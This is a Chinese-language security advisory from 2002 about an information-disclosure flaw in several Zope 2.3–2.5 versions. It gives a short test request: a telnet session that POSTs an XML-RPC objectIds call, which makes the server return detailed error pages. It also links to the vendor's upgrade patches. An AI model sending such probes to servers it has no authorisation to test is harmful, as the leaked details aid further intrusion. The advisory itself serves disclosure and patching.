首页 -> 安全研究

安全研究

安全漏洞
Zope畸形XML-RPC请求导致远程信息泄露漏洞

发布日期:2002-09-26
更新日期:2002-09-30

受影响系统:
Zope Zope 2.5.1
Zope Zope 2.5.0
Zope Zope 2.4.4 b1
Zope Zope 2.4.3
Zope Zope 2.4.2
Zope Zope 2.4.1
Zope Zope 2.4.0
Zope Zope 2.3.3
Zope Zope 2.3.2
不受影响系统:
Zope Zope 2.6.0b1
Zope Zope 2.5.1 b1
描述:
BUGTRAQ  ID: 5806

Zope是一款基于Python的开放源代码内容管理系统服务程序。

Zope没有正确处理XML-RPC请求,远程攻击者可以利用这个漏洞获得系统敏感信息。

攻击者构建畸形的XML-RPC请求给Zope服务器,由于Zope处理错误可导致Zope返回包含详细系统信息的错误页面,攻击者可以利用这些信息进一步对系统进行攻击。

<*来源:Rossen Raykov (Rossen.Raykov_at_CognicaseUSA.com)
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rossen Raykov (Rossen.Raykov_at_CognicaseUSA.com)提供了如下测试方法:

telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93

<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>

建议:
厂商补丁:

Zope
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到最新版:

Zope Upgrade Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz

Zope Upgrade Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-sparc.tgz

Zope Upgrade Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe

浏览次数:2895
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障